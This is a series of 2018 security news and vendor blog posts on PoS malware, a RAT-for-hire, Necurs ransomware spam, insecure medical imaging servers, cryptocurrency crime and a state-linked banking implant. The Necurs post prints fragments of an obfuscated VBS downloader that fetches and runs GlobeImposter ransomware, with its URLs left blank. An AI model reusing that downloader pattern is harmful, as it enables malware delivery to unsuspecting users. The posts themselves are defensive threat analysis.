The report has five primary recommendations to counter the threat of ransomware: backup data; employ multi-layered security defenses; upgrade to the latest software and enforce judicious patching; isolate or retire computers that cannot be patched; and manage and control privileged credentials. A new survey from Thycotic demonstrates just how poor many organizations are at managing privileged accounts.

There is no mention of a sixth potential recommendation -- if infected with ransomware, immediately visit the NoMoreRansom project website. This project aggregates known ransomware decryptors, and it is possible that victims might be able to recover encrypted files without recourse to the risky option of paying the ransom. For now, Microsoft does not appear to be a partner in this project.

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

Experts discovered a new tiny Pos Malware dubbed Pinkkite

Researchers presented findings on a new strain of point-of-sale malware, dubbed PinkKite, that was spotted by security experts at Kroll Cyber Security.

A new strain of point-of-sale malware, dubbed PinkKite, was spotted by security experts at Kroll Cyber Security.

PinkKite was first discovered in 2017 while the experts were instigating into a large POS malware campaign.

PinkKite is a tiny malware, it is less than 6k in size with a small footprint to make hard its detection. The malware also employs another layer of obfuscation via a double-XOR operation that encodes the 16 digits of the credit card number with a predefined key to make hard the detection. The PoS malware implements classic memory-scraping feature and procedures for data validation.

“Where PinkKite differs is its built-in persistence mechanisms, hard-coded double-XOR encryption (used on credit card numbers) and backend infrastructure that uses a clearinghouse to exfiltrate data to,” explained Courtney Dayter who presented the threat at Kaspersky Lab’s Security Analyst Summit along with Matt Bromiley.

PinkKite PoS

Crooks behind the PinkKite PoS malware campaign used three clearinghouses located in South Korea, Canada. and the Netherlands to receive the stolen data, this choice made the operation very noisy and easy to detect.

The PinkKite executable poses itself as a legitimate Windows program using file names like Svchost.exe, Ctfmon.exe, and AG.exe.

The PinkKite first scrapes a credit card data from the PoS memory, then it uses a Luhn algorithm to validate credit and debit card numbers.

The credit card data is stored in compressed files with names such as .f64, .n9 or .sha64. Each record can contain up to  7,000 credit card numbers, a lot of records are periodically sent manually using a separate Remote Desktop Protocol (RDP) session to one of the three PinkKite clearinghouses.

“Once the data was scraped by PinkKite, it was written to a file on a remote system. These remote ‘collection’ systems served as central collection points (clearinghouses) for hundreds or thousands of malware output files,” Dayter said.

According to Kroll, attackers behind the PoS malware likely compromised one main system and then from there used PsExec for lateral movements inside the target network.

Attackers also used the popular Mimikatz post-exploitation tool to extract credentials from the Local Security Authority Subsystem Service (LSASS), then once systems were compromised, attackers would access it to remove the credit card data via the RDP session.

Pierluigi Paganini

(Security Affairs – cybercrime, PoS malware)

The post Experts discovered a new tiny Pos Malware dubbed Pinkkite appeared first on Security Affairs.

Qrypter RAT Hits Hundreds of Organizations Worldwide

Hundreds of organizations all around the world have been targeted in a series of attacks that leverage the Qrypter remote access Trojan (RAT), security firm Forcepoint says.

The malware, often mistaken for the Adwind cross-platform backdoor, has been around for a couple of years, and was developed by an underground group called ‘QUA R&D’, which offers a Malware-as-a-Service (MaaS) platform.

Also known as Qarallax, Quaverse, QRAT, and QontrollerForcepoint explains that Qrypter is a Java-based RAT that leverages TOR-based command and control (C&C) servers. It was first detailed in June 2016, after being used in an attack targeting individuals applying for a U.S. Visa in Switzerland.

The malware is typically delivered via malicious email campaigns that usually consist of only a few hundred messages each. However, Qrypter continues to rise in prominence, and three Qrypter-related campaigns observed in February 2018 affected 243 organizations in total, Forcepoint's security researchers say.

When executed on a victim’s system, Qrypter drops and runs two VBS files in the %Temp% folder, each featuring a random filename. The two scripts are meant to gather information on the firewall and anti-virus products installed on the computers.

Qrypter is a plugin based backdoor that provides attackers with a broad range of capabilities: remote desktop connection, webcam access, file system manipulation, installation of additional files, and task manager control.

The RAT is available for rent for a price of $80, payable in PerfectMoney, Bitcoin-Cash, or Bitcoin. Interested parties can purchase three months or one-year subscriptions for a discounted price, the security researchers discovered.

An older Bitcoin address associated with payments for Qrypter subscriptions was appears to have received a total of 1.69 BTC (around $13,500 at the time of publishing). This, however, is only one of the addresses that the malware authors use, meaning that their earnings could be much higher.

The malware developers provide support to their customers via a forum called ‘Black&White Guys’, which currently has over 2,300 registered members.

Based on the content of the forum, the researchers were able to discover how QUA R&D operates. The group appears focused on keeping customers happy, and is regularly creating threads to inform and reassure users that their crypting service (available for $5) is fully undetected by anti-virus vendors.

“Indeed, ensuring their product is fully undetectable is one of the primary priorities for the group and potentially explains why even after nearly two years Qrypter remains largely undetected by anti-virus vendors,” Forcepoint notes.

In addition to interacting with customers, the forum is also used to attract potential resellers, which receive discount codes to help increase Qrypter's popularity in underground circles. Furthermore, older RAT versions are offered for free to customers, and QUA R&D’s strategy also involves the cracking of competitor products, to create FUD (fear, uncertainty, and doubt) about competition.

“While the Qrypter MaaS is relatively cheap, QUA R&D's occasional release of cracked competitor products may exponentially increase attacks in the wild by making potent crimeware accessible to anyone for free,” Forcepoint concludes.

Related: Ongoing Adwind Phishing Campaign Discovered

Necurs Botnet Leads the World in Sending Spam Traffic

In Q4 2017 we found that the Necurs and Gamut botnets comprised 97% of spam botnet traffic. (See the McAfee Labs Threats Report, March 2018.) Necurs (at 60%) is currently the world’s largest spam botnet. The infected computers operate in a peer-to-peer model, with limited communication between the nodes and the control servers. Cybercriminals can rent access to the botnet to spread their own malicious campaigns.

The most common techniques are email attachments with macros or JavaScript to download malware from different locations. In October, the Locky ransomware campaign used Microsoft’s Dynamic Data Exchange to lure victims into “updating” the attached document with data from linked files—external links that delivered the malware.

In Q4 we noticed several botnet campaigns delivering the following payloads:

  • GlobeImposter ransomware
  • Locky ransomware
  • Scarab ransomware
  • Dridex banking Trojan

A timeline:

Let’s zoom in on one of the campaigns from the Necurs botnet. In the following example, an email automatically sent from a VOIP system informs the victim of a missed call. The email contains an attachment, a Visual Basic script.

In this case, the name is “Outside Caller 19-12-2017 [random nr].” Here is some of the script code:

Execute "Sub Aodunnecessarilybusinesslike(strr):ZabiT.Savetofile writenopopbusinesslikeInPlaceOf , 2 : End Sub"

Disaster = "//21+12:ptth21+12ex"+"e.eUtaLHpbP\21+12elifotevas21+12ydoBes"+"nopser21+12etirw21+12nepo21+12epyT21+12PmeT21+12TeG21+12ssecorP21+12llehs.tpircsW21+12noitacilppA.llehs21+12" & "" 


This piece of code makes sure that the embedded code will be saved to a file. Note the second line of code: It is backward and calls the Windows script shell to execute the code. The following code string ensures that the backward line is read properly:

SudForMake = Split("Microsoft.XMLHTTP21+12Adodb.streaM"+StrReverse(Disaster),  "21+12")


The following line starts the saved code:

writenopopbusinesslikeMacAttack.Run("cmd."&"exe /c START """" "+" " & ArrArr ) 


Once the executable is started, it attempts to download the ransomware from the embedded URLs in the code: 

krapivec = Array("","","") 


The malware downloaded and executed is GlobeImposter ransomware. After encrypting all files and deleting the Volume Shadow copies to block file restore, the user is prompted with the request to buy the decryptor:

Spam botnets are one of the pillars of the cybercrime business. The authors of these botnets understand their market value and spend their rental income on continuous development. Their work keeps the infrastructure running, creates ever-changing spam messages, and delivers these messages to your inbox—with many avoiding spam blockers. This cybercrime effort should inspire your organization to discuss the implementation of DMARC (domain-based message authentication, reporting & conformance). To learn more about how DMARC can help protect against this kind of threat, visit For more on Necurs, see the McAfee Labs Threats Report, June 2017.

The post Necurs Botnet Leads the World in Sending Spam Traffic appeared first on McAfee Blogs.

‘McAfee Labs Threats Report’ Examines Cryptocurrency Hijacking, Ransomware, Fileless Malware

Today McAfee published the McAfee Labs Threats Report: March 2018. The report looks into the growth and trends of new malware, ransomware, and other threats in Q4 2017. McAfee Labs saw on average eight new threat samples per second, and the increasing use of fileless malware attacks leveraging Microsoft PowerShell. The Q4 spike in Bitcoin value prompted cybercriminals to focus on cryptocurrency hijacking through a variety of methods, including malicious Android apps.

Each quarter, McAfee Labs, led by the Advanced Threat Research team, assesses the state of the cyber threat landscape based on threat data gathered by the McAfee Global Threat Intelligence cloud from hundreds of millions of sensors across multiple threat vectors around the world. McAfee Advanced Threat Research complements McAfee Labs by providing in-depth investigative analysis of cyberattacks from around the globe.

Cybercriminals Take on New Strategies, Tactics

The fourth quarter of 2017 saw the rise of newly diversified cybercriminals, as a significant number of actors embraced novel criminal activities to capture new revenue streams. For instance, the spike in the value of Bitcoin prompted actors to branch out from moneymakers such as ransomware, to the practice of hijacking Bitcoin and Monero wallets. McAfee researchers discovered Android apps developed exclusively for the purpose of cryptocurrency mining and observed discussions in underground forums suggesting Litecoin as a safer model than Bitcoin, with less chance of exposure.

Cybercriminals also continued to adopt fileless malware leveraging Microsoft PowerShell, which surged 432% over the course of 2017, as the threat category became a go-to toolbox. The scripting language was used within Microsoft Office files to execute the first stage of attacks.

Health Care Targeted

Although publicly disclosed security incidents targeting health care decreased by 78% in the fourth quarter of 2017, the sector experienced a dramatic 210% overall increase in incidents in 2017. Through their investigations, McAfee Advanced Threat Research analysts conclude many incidents were caused by organizational failure to comply with security best practices or address known vulnerabilities in medical software.

McAfee Advanced Threat Research analysts looked into possible attack vectors related to health care data, finding exposed sensitive images and vulnerable software. Combining these attack vectors, analysts were able to reconstruct patient body parts, and create three-dimensional models.

Q4 2017 Threats Activity

Fileless malware. In Q4 JavaScript malware growth continued to slow with new samples decreasing by 9%, while new PowerShell malware more than tripled, growing 267%.

Security incidents. McAfee Labs counted 222 publicly disclosed security incidents in Q4, a decrease of 15% from Q3. 30% of all publicly disclosed security incidents in Q4 took place in the Americas, followed by 14% in Europe and 11% in Asia.

Vertical industry targets. Public, health care, education, and finance, respectively, led vertical sector security incidents for 2017.

  • Health Care. Disclosed incidents experienced a surge in 2017, rising 210%, while falling 78% in Q4.
  • Public sector. Disclosed incidents decreased 15% in 2017, down 37% in Q4.
  • Disclosed incidents rose 125% in 2017, remaining stagnant in Q4.
  • Disclosed incidents rose 16% in 2017, falling 29% in Q4. 

Regional targets

  • Disclosed incidents rose 46% in 2017, falling 46% in Q4.
  • Disclosed incidents fell 58% in 2017, rising 28% in Q4.
  • Disclosed incidents fell 20% in 2017, rising 18% in Q4.
  • Disclosed incidents rose 42% in 2017, falling 33% in Q4. 

Attack vectors. In Q4 and 2017 overall, malware led disclosed attack vectors, followed by account hijacking, leaks, distributed denial of service, and code injection.

Ransomware. The fourth quarter saw notable industry and law enforcement successes against criminals responsible for ransomware campaigns. New ransomware samples grew 59% over the last four quarters, while new ransomware samples growth rose 35% in Q4. The total number of ransomware samples increased 16% in the last quarter to 14.8 million samples.

Mobile malware. New mobile malware decreased by 35% from Q3. In 2017 total mobile malware experienced a 55% increase, while new samples declined by 3%.

Malware overall. New malware samples increased in Q4 by 32%. The total number of malware samples grew 10% in the past four quarters.

Mac malware. New Mac OS malware samples increased by 24% in Q4. Total Mac OS malware grew 58% in 2017.*

Macro malware. New macro malware increased by 53% in Q4, declined by 35% in 2017.

Spam campaigns. 97% of spam botnet traffic in Q4 was driven by Necurs—recent purveyor of “lonely girl” spam, pump-and-dump stock spam, and Locky ransomware downloaders—and by Gamut—sender of job offer–themed phishing and money mule recruitment emails.

*This blog post has been edited to correct the percentage increase of Mac OS malware in 2017.

For more information on these threat trends and statistics, please visit:

Twitter @Raj_Samani & @McAfee_Labs.

The post ‘McAfee Labs Threats Report’ Examines Cryptocurrency Hijacking, Ransomware, Fileless Malware appeared first on McAfee Blogs.

McAfee Researchers Find Poor Security Exposes Medical Data to Cybercriminals

The nonperishable nature of medical data makes an irresistible target for cybercriminals. The art of hacking requires significant time and effort, encouraging experienced cybercriminals to plot their attacks based on the return they will see from their investment. Those who have successfully gained access to medical data have been well rewarded for their efforts. One seller stated in an interview that “someone wanted to buy all the … records specifically,” claiming that the effort had netted US$100,000.

While at a doctor’s appointment with my wife watching a beautiful 4D ultrasound of our unborn child, I noticed the words “saving data to image” flash on the screen. Although this phrase would not catch the attention of most people, given my research on how cybercriminals are targeting the health care industry, I quickly began to wonder why an ultrasound of our child would not instead save to a file. Intrigued, I decided to dig into the world of medical imaging and its possible security risks. The results were disturbing; ultimately, we were able to combine attack vectors to reconstruct body parts from the images and make a three-dimensional model.


Most hospitals or medical research facilities use PACS, for picture archiving and communication system, so that images such as ultrasounds, mammograms, MRIs, etc. can be accessed from the various systems within their facility, or through the cloud.

A PACS setup contains multiple components, including a workstation, imaging device, acquisition gateway, PACS controller, database, and archiving—as illustrated in the following graphic:

The basic elements of PACS infrastructure.

The imaging device creates a picture, such as an ultrasound or MRI, which is uploaded to an acquisition gateway. Because much of the imaging equipment in use by medical facilities does not align with security best practices, acquisition gateways are placed in the network to enable the digital exchange of the images. The acquisition gateway also often acts as the server connecting to the hospital’s information system (using the HL7 protocol) to enrich images with patient data.

The PACS controller is the central unit coordinating all traffic among the different components. The final component in the PACS infrastructure is the database and archiving system. The system ensures that all images are correctly stored and labeled for either short- or long-term storage.

Larger implementations might have multiple imaging devices and acquisition gateways in various locations, connected over the Internet. During our investigation, we noticed many small medical practices around the world using free, open-source PACS software, which was not always securely implemented.

To determine how many PACS servers are connected depends on on how you search using Shodan, a search engine for finding specific types of computers connected to the Internet. Some servers connect over TCP 104; others use HTTP TCP 80 or HTTPS TCP 443. A quick search revealed more than 1,100 PACS directly connected to the Internet, not behind a recommended layer of network security measures or virtual private networks (VPNs).

PACS systems connected to the Internet. Darker colors represent more systems.

Our eyebrows began to rise very early in our research, as we came across “IE 6 support only” messages or ActiveX controls and old Java support; many of these products are vulnerable to a plethora of exploits. For example, one of the PACS generated an error page when we changed one parameter. This is a very basic common way of testing if the application developers did proper input sanitation check to prevent attackers inserting code or generating failures that could reveal data about the application and can give clues to compromise the system.

A stack-trace error.

The stack-trace dump revealed the use of Apache Tomcat Version 7.0.13, which has more than 40 vulnerabilities.

When communicating with the DICOM (digital imaging and communications in medicine) port, TCP 104, it is possible to grab the banner of a server and get a response. As we queried, we recorded different responses. Let’s look at one:

\x02\x00\x00\x00\x00\xbe\x00\x01\x00\x00ANY-SCP         FINDSCU         \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x151.2.840.10008.!\x00\x00\x1b\x01\x00\x00\x00@\x00\x00\x131.2.840.10008.1.2.1P\x00\x00>Q\x00\x00\x04\x00\x00@\x00R\x00\x00"1.2.826.0.1.3680043.2.135.1066.101U\x00\x00\x0c1.4.16/WIN32


The FINDSCU string refers to the findscu tool, which can be used to query a PACS system. The DICOM standard defines three data models for the query/retrieve service. Each data model has been assigned with one unique ID for the C-FIND, one for the C-MOVE, and one for C-GET; so all together there are nine unique IDs, three for each model. In the preceding banner, we retrieved two of those IDs:

  • 2.840.10008.1.2.1: A transfer unique ID that defines the value “Explicit VR Little Endian” for data transfer
  • 2.826.0.1.3680043.2.135.1066.101: A value referring to the implementation class

Another value in the banner, “1.4.16/WIN32,” refers to the implementation version. In the context of the medical servers, this refers to the version of XAMPP, aka Apache with MariaDB, PHP, and Perl. This server was running Apache 2.4.9, which is publicly known to contain nine vulnerabilities.

In other cases, there was no need to search for vulnerabilities. The management interface was wide open and could be accessed without credentials.

A PACS interface.

What does this mean? It is possible to access the images.


In addition to expensive commercial PACS systems, open-source or small-fee PACS are available for small health care institutions or practices. As we investigated these systems, we found that our fears were well founded. One web server/client setup used the defaults “admin/password” as credentials without enforcing a change when the server is started for the first time. We found more problems:

  • Unencrypted traffic between client and server
  • Click jacking
  • Cross-site scripting (reflected)
  • Cross-site scripting stored as cross-site request forgery
  • Document object model–based link manipulation
  • Remote creation of admin accounts
  • Disclosure of information

Many of these are ranked on the list of OWASP Top 10 Most Critical Web Application Security Risks list, which highlights severe flaws that should be addressed in any product delivered to a customer.

We have reported the vulnerabilities we discovered to these vendors following our responsible disclosure process. They cooperated with us in investigating the vulnerabilities and taking appropriate actions to fix the issues.

But why should we spend so much time and effort in researching vulnerabilities when there are many other ways to retrieve medical images from the Internet?

Medical Image Formats

The medical world uses several image formats for different purposes. Each format has different requirements and works with different equipment, protocols, etc. A few format examples:

  • NifTi Neuroimaging Informatics Technology Initiative
  • Dicom Digital Imaging and Communications in Medicine
  • MINC Medical Imaging NetCDF
  • NRRD Nearly Raw Raster Data

Searching open directories and FTP servers while using several search engines, we gathered thousands of images—some of them complete MRI scans, mostly in DICOM format. One example:

An open directory of images.

The DICOM format originated in the 1980s, before cybersecurity was a key component. The standard format contains a detailed list of tags such as patient name, station name, hospital, etc. All are included as metadata with the image.

Opening an image with a text editor presents the following screen:

An example of the DICOM file format.

The file begins with the prefix DICM, an indicator that we are dealing with a DICOM file.  Other (now obscured) strings in this example include the hospital’s name, city, patient name, and more.

The Health Insurance Portability and Accountability Act requires a secure medical imaging workflow, which includes the removal or anonymizing of metadata in DICOM files. Researching the retrieved files from open sources and directories, we discovered most of the images still contained this metadata, such as in the following example, from which we extracted (obscured) personally identifiable information (PII).

Metadata discovered in a DICOM file.

Combining Vulnerabilities and Metadata

We combined possible vulnerabilities and the metadata to create a test scenario, installing information from a dummy patient, including an x-ray picture of a knee, to the vulnerable PACS server.

Our test patient record, followed by an x-ray of a knee. 

Using vulnerability information gathered in an earlier phase of research, we launched an attack to gain access to the PACS server. Once we had access, we downloaded the image from our dummy patient and altered the metadata of the image series, changing all references of “knee” to “elbow.”

Altered metadata of the test patient image.

We then saved the picture and uploaded it to the server. Checking the records of our dummy patient, we found our changes were successful.

Changes successfully updated.

Reconstructing Body Parts

In the medical imaging world, a large array of software can investigate and visualize images in different ways, for example, in 3D. We took our collection of images, and using a demo version of 3D software, we reconstructed complete 3D models of vertebrae, pelvis, knees, etc. and, in one case, we reconstructed a partial face.

Because we firmly believe in protecting privacy, the following example—a series of images from a pelvis—comes from a demo file that accompanies the software.

An example of a series of images.

After selecting areas of interest and adjusting the levels, we generated a 3D model of the pelvis:

A 3D model of the pelvis.

The application that generated the 3D model has a feature that allowed us to export the model in several data formats to be used by other 3D drawing programs. After the export, we imported the data into a 3D drawing program and converted the file to STL, a popular format for 3D objects and printers.

In short, we began with files from open directories, transformed them into a 3D model, and printed a tangible model using a 3D printer:

Our 3D model of a pelvis.


When we began our investigation into the security status of medical imaging systems, we never expected we would conclude by reconstructing body parts. The amount of old software used in implementations of PACS servers and the amount of vulnerabilities discovered within the software itself are concerning. We investigated relatively few open-source vendors, but it begs the question: What more could we have found if we had access to professional hardware and software?

Default accounts, cross-site scripting, or vulnerabilities in the web server could lead to access to the systems. Our research demonstrates that once inside the systems, the data and pictures can be permanently altered.

In May 2017, one report claimed that through artificial intelligence pictures could be studied to determine how long a person will live. What if criminals could obtain that information and use it for extortion?

We understand the need for quickly sharing medical data for diagnosis and treatment and for storing medical images. We advise health care organizations to be careful when sharing images on open directories for research purposes and to at least scrape the PII data from the images.

For organizations using a PACS, ask your vendor about its security features. Employ a proper network design in which the sharing systems are properly secured. Think not only about internal security but also about the use of VPNs and two-factor authentication when connecting with external systems.


For more on the health care industry follow @McAfee_Labs and catch up on all threats statistics from Q417 in the March Threats Report.

The post McAfee Researchers Find Poor Security Exposes Medical Data to Cybercriminals appeared first on McAfee Blogs.

McAfee Researchers Analyze Dark Side of Cryptocurrency Craze: Its Effect on Cybercrime

In December 2017 Bitcoin values skyrocketed, peaking at the unprecedented amount of roughly US$19,000 per coin. Unsurprisingly, the market for cryptocurrencies exploded in response. Investors, companies, and even the public found a fresh interest in digital currencies. However, the exciting change in Bitcoin value did not just influence your average wealth seeker. It also influenced vast underground cybercriminal markets, malware developers, and cybercriminal behavior.

Blessing and Curse

The surge of Bitcoin popularity and price per coin piqued the interest of cybercriminals, driving cryptocurrency hijacking in the last quarter of 2017. However, the same popularity and price jump also created a headache for bad actors. Ransomware techniques and the buying and selling of goods became problematic. The volatility of the Bitcoin market makes ransom costs hard to predict at the time of infection and costs can surge upwards of $28 per transaction, complicating a criminal campaign. The volatility made mining, the act of using system resources to “mint” cryptocurrency, exceedingly difficult and raised transaction prices. This was especially true for Bitcoin, due its high hash rate of the network. (The higher the hash rate, the more people they compete against.)

Cybercriminals will always seek to combine the highest returns in the shortest time with the least risk. With the Bitcoin surge, malware developers and underground markets found themselves in need of more stability, prompting a switch to other currencies and a resurgence of old techniques.

It is far easier to mine small currencies because the hash rate is generally more manageable and hardware requirements can be more accessible depending on the network design. Monero, for example, is ASIC resistant, meaning that while mining specialized hardware does not have an overwhelming advantage to nonspecialized hardware. This allows the average computer to be more effective at the task. Due to this advantage, Monero is actively mined in mass by criminals using web-based miners on the machines of unsuspecting visitors. This intrusion is known as cryptojacking, which works by hijacking the browser session to use system resources. A quick look at recent examples of cryptojacking throws light on this issue. Starting mid-2017, there have been a slew of instances in which major websites have found themselves compromised and unwittingly hosting the code, turning their users into mining bots. The public Wi-Fi at a Starbucks outlet was found to hijack browsers to mine Monero. Even streaming services such as YouTube have been affected through infected ads. Ironically, Monero is said to be one of the most private cryptocurrencies. Attacks such as these have also happened on Bitcoin, NEM, and Ethereum.

Criminals are also leveraging techniques beyond mining, such as cryptocurrency address or wallet hijacking. For example, Evrial, a Trojan for sale on underground markets, watches the Windows clipboard and replaces any cryptocurrency wallet addresses with its own malicious address. Essentially, this hijacks a user’s intended payment address to redirect funds. Unwitting users could accidentally pay a bad actor, losing their coins with essentially no chance of recovery.

A Brief Timeline

Cybercriminals have always faced the difficulty of securing their profits from government eyes. For the cybercriminal, banks present risk. If a transfer is deemed illegal or fraudulent, the bank transfer can easily be traced and seized by the bank or law enforcement. Trading in traditional currencies requires dealing with highly regulated entities that have a strong motivation to follow the rules. Any suspicious activity on their systems could easily result in the seizure of funds. Cybercriminals have long tried to solve this problem using various digital currencies, the prelude to cryptocurrencies. When cryptocurrencies were introduced to the world, cybercriminals were quick to adapt. However, with this adoption came Trojans, botnets, and other hacker activities designed specifically for the new technology.

The evolution of digital currencies. Despite various attacks from bad actors, digital money continues to evolve.

1996: E-gold appeared, and quickly became popular with cybercriminals due to its lack of verification on accounts. This was certainly welcome among “carder groups” such as ShadowCrew, which trafficked in stolen credit cards and other financial accounts. However, with three million accounts, e-gold’s popularity among criminals also caused its demise: It was taken down just 10 years later by the FBI, even after attempts in 2005 to rein in criminal activity. Accounts were seized and the founder indicted, collapsing all e-gold operations.

2005: Needing another avenue after the collapse of e-gold, cybercriminals migrated to WebMoney, established in 1998. Unlike e-gold, WebMoney successfully discouraged the bulk of cybercriminals by modifying business practices to prevent illegal activities. This kept the organization alive but pushed many cybercriminals to find a new payment system.

2006: Liberty Reserve took on much of the burgeoning cybercriminal demand. The institution got off to a rocky start with cybercriminals due to the almost immediate arrest of its founders. The company’s assets were seized in 2013—causing an estimated $6 billion in lost criminal funds.

2009: Cybercriminals were increasingly desperate for a reliable and safe payment system. Enter Bitcoin, a decentralized, pseudo-anonymous payment system built on blockchain technology. With WebMoney usage growing increasingly difficult for cybercriminals and Liberty Reserve under scrutiny from world governments, cybercriminals required something new. Within the Bitcoin network, no central authority had the power to make decisions or otherwise seize funds. These protections against centralized seizures, as well as many of its anonymity features, were a major influence in the migration of cybercriminals to Bitcoin.

Game Changers

By 2013 cybercriminals had a vested interest in cryptocurrencies, primarily Bitcoin. Cryptocurrency-related malware was in full swing, as evidenced by increasingly sophisticated botnet miner kits such as BitBot. Large enterprises such as Silk Road, primarily a drug market, thrived on the backbone of cryptocurrency popularity. Then three major events dramatically changed the way cybercriminals operated.

Silk Road closed: The popular black market and first major modern cryptocurrency “dark net” market was shut down by the FBI. The market was tailored to drug sales, and the FBI takedown left its buyers and sellers without a place to sell their goods. The migration of buyers and sellers to less restrictive markets enabled cross-sales to a much larger audience than was previously available to cybercriminals. Buyers of drugs could now also buy stolen data—including Netflix accounts or credit cards—from new markets such as AlphaBay as demand increased.

Major retailers breached: Millions of credit card records were stolen and available, raising the demand for underground markets to buy and sell the data. Dark net markets already offering malware and other goods and services took up the load. Agora, Black Market Reloaded and, shortly thereafter, AlphaBay responded to that demand. Although many of these markets were scams, a few such as AlphaBay, which survived until its July 2017 takedown, were hugely successful. Through these markets, cybercriminals had access to a much larger audience and could benefit from centralized structures and advertising. The demand for other types of stolen data rose even more, particularly streaming media accounts and personally identifiable information, which carries a high financial return for cybercriminals.

In the past, many of the credit card records were sold on forums and other specialized carding sites, such as Rescator. The new supply of credit card data was so massive, however, that it enabled secondhand sales and migration into broader markets. Dark net markets were simply more scalable than forums, thus enabling their further growth. New players joining the game now had easy access to goods, stolen data, and customers. This shift reshaped and enabled retail targeting as it exists today.

Cryptocurrency-based ransomware introduced: Outside of dark net markets, malware developers sought to acquire cryptocurrencies. Prior to 2013 the primary method to maliciously acquire coin was through mining. Less effective methods included scams, such as TOR-clone sites, fake markets, or Trojans designed to steal private keys to wallets. By late 2013 malware developers and botnet owners sold their malware at a premium by including mining software alongside the usual items such as credit cards and password scrapers. However, at a cost of around $250 per coin, Bitcoin miners did not immediately see higher profits than they could manage with focused scraper malware. Criminals needed more reliable ways of acquiring coins.

Ransomware, a potentially lucrative form of malware, was already on the rise using other digital currencies. In late 2013, the major ransomware family CryptoLocker included a new option for ransomware victims—to pay via Bitcoin. The tactic effectively created a frenzy of copycat malware. Now malware developers could outpace the profits of scraper malware as well as secure currency for the underground market. Ransomware quickly enjoyed several immensely successful campaigns, many of which, including Locky and Samsa, are still popular. Open-source tools such as Hidden Tear allowed low-skilled players to enter the market and acquire cryptocurrencies through ransomware with only limited coding knowledge. The thriving model ransomware as a service emerged with TOX, sold via a TOR hidden service in 2015.

The use of cryptocurrencies by malicious actors has grown substantially since their inception in 2009. Cryptocurrencies meet a need and have been exploited in ever-evolving ways since their introduction. The influence of cryptocurrencies on underground markets, malware development, and attackers behavior cannot be understated. As markets change and adopt cryptocurrencies, we will surely see further responses from cybercriminals.


“Dynamic Changes in Underground Markets,” by Charles McFarland. Cyber Security Practitioner, Vol. 2, Issue 11. November 2016.

The post McAfee Researchers Analyze Dark Side of Cryptocurrency Craze: Its Effect on Cybercrime appeared first on McAfee Blogs.

Can’t Keep Up? 6 Easy Things You Can Do to Keep Your Kids Safe Online

Having a hard time doing what needs to be done to keep your kids safe online? Do you mentally shrink back when you realize you don’t do any of the tips experts so often recommend? Let the guilt go, parent because you are not alone.

Family life moves at warp speed. We want to keep up, we do everything we can to keep up, but sometimes — depending on the season of life — our best intentions get left on the roadside gulping dust.

So if you feel like you are falling behind, we put together this quick cheat sheet that will allow you to cover your safety bases and regain some ground on the technology front.

6 Easy Things You Can Do to Keep Your Kids Safe Online

Ask about apps

Restrictions on apps exist for a reason. Glance through your child’s home screen and ask about any app you don’t recognize. If you are unsure about an app’s functionality, audience, or risks, dig deeper. This step covers a lot of ground since apps are the #1 way tweens and teens gain access to mature content.

YouTube Safety Mode

Your kids probably spend a ton of time watching videos online andwho knows what their eyes have seen or what links they’ve clicked. What you may not realize is that YouTube has a safety feature that will block most inappropriate or sexual content from search, related videos, playlists, shows, and films. For kids under four, there’s YouTube Kids.

Google SafeSearch

While it’s not going to be as powerful as filtering software, Google has a SafeSearch feature that will filter explicit content (links, videos, and images) on any device. Google also has a reporting system if anything gets through their feature.

Verify Privacy Settings

This step is a five-minute conversation with your child that will remove some risks. If your child is on Facebook, Instagram, Snapchat or Twitter, make sure their privacy settings are marked “private.” This will keep anyone outside of their friend group from connecting with them. As part of the privacy settings chat, review strong password practices.

Relationship over rules

The #1 way to safeguard your kids against online risk, is making sure you have a strong relationship. Spend tech-free time together, listen and observe how your child uses and enjoys his or her devices. A healthy parent-child relationship is foundational to raising a wise digital citizen who can make good choices and handle issues such as cyberbullying, sexting, conflict, or online scams. Connect with your child daily. Talk about what’s new with school, their friends, and anything else important to them. Along the way, you’ll find out plenty about their online life and have the necessary permission (and trust) to work your concerns about online safety into any conversation.

Friend and follow but don’t stalk

Many parents cringe at the thought of opening a Twitter or Snapchat account, but if that is where your child spends most of his or her time, it’s time to open an account. It’s easy by the way. The wise rule here is that once you follow your child, give them space and privacy. Don’t chime in on the conversation or even compliment them. While they may appreciate your “likes” on Instagram, they aren’t too happy with “mom comments” as my daughter calls them. If you have a concern about a photo or comment your child has uploaded, handle it through a Direct Message or face to face but never in the public feed.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post Can’t Keep Up? 6 Easy Things You Can Do to Keep Your Kids Safe Online appeared first on McAfee Blogs.

New traces of Hacking Team in the wild

Since being founded in 2003, the Italian spyware vendor Hacking Team gained notoriety for selling surveillance tools to governments and their agencies across the world. The capabilities of its flagship product, the Remote Control System (RCS), include extracting files from a targeted device, intercepting emails and instant messaging, as well as remotely activating a device’s webcam and microphone.

The post New traces of Hacking Team in the wild appeared first on WeLiveSecurity

Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant

This post was prepared with contributions from Asheer Malhotra, Charles Crawford, and Jessica Saavedra-Morales. 

On February 28, the McAfee Advanced Threat Research team discovered that the cybercrime group Hidden Cobra continues to target cryptocurrency and financial organizations. In this analysis, we observed the return of Hidden Cobra’s Bankshot malware implant surfacing in the Turkish financial system. Based on the code similarity, the victim’s business sector, and the presence of control server strings, this attack resembles previous attacks by Hidden Cobra conducted against the global financial network SWIFT.

In this new, aggressive campaign we see a return of the Bankshot implant, which last appeared in 2017. Bankshot is designed to persist on a victim’s network for further exploitation; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations.

Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document. The document contains an embedded Adobe Flash exploit, which was recently announced by the Korean Internet Security agency. The exploit, which takes advantage of CVE-2018-4878, allows an attacker to execute arbitrary code such as an implant.

